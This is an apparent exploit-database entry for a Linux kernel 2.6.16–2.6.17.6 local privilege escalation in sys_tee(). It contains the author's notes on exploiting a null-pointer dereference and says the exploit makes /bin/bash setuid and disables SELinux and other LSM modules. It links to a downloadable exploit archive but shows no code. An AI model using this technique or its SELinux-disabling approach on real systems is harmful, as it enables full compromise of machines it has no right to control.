33 lines
No EOL
1.5 KiB
Text
33 lines
No EOL
1.5 KiB
Text
source: https://www.securityfocus.com/bid/22823/info
|
|
|
|
The Linux kernel is prone to a local privilege-escalation vulnerability.
|
|
|
|
Exploiting this issue allows local attackers to gain superuser privileges, facilitating the complete compromise of affected computers.
|
|
|
|
|
|
|
|
Linux 2.6.16 -> 2.6.17.6 local root exploit in sys_tee()
|
|
------------------------------------------------------------
|
|
*proof that null ptr dereference bugs can be exploited*
|
|
------------------------------------------------------------
|
|
Bug in fs/splice.c was silently fixed in 2.6.17.7, even though
|
|
the SuSE developer who fixed the bug knew it to be a "local DoS"
|
|
Changelog stated only: "splice: fix problems with sys_tee()"
|
|
On LKML, the user reporting tee() problems said the oops
|
|
was at ibuf->ops->get(ipipe, ibuf), where ibuf->ops was NULL
|
|
Exploitation is trivial, mmap buffer at address 0, 7th dword
|
|
is used as a function pointer by the kernel (the get())
|
|
------------------------------------------------------------
|
|
May need to run multiple times to catch race.
|
|
Exploit does chmod u+s on /bin/bash and disables all LSM modules,
|
|
including SELinux.
|
|
Code involved with disable_selinux() in tee42-24tee.c should be independent
|
|
enough to be plugged into any kernel exploit where you have arbitrary
|
|
code execution.
|
|
Remember to use /bin/bash -p when executing rootshell
|
|
This exploit is *NOT* stealthy. You'll have to do some serious work
|
|
to exploit this bug silently.
|
|
|
|
|
|
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29714.tgz |